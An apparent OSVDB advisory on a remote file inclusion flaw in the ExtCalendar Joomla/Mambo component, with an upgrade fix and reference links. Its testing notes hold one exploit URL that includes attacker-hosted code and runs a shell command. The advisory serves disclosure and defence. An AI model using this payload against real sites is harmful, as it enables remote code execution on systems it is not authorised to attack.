ExtCalendar for Mambo/Joomla extcalendar.php mosConfig_absolute_path Remote File Inclusion

2006-07-07T23:41:06
ID OSVDB:28079
Type osvdb
Reporter OSVDB
Modified 2006-07-07T23:41:06

Description

Solution Description

Upgrade to version 0.9.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/[path]/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls

References:

Vendor URL: http://extcal.sourceforge.net/ Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79050.0.html Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,75390.0.html Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,78268.0.html Other Advisory URL: http://advisories.echo.or.id/adv/adv36-matdhule-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0398.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0079.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0310.html Keyword: ECHO_ADV_36$2006 Bugtraq ID: 18876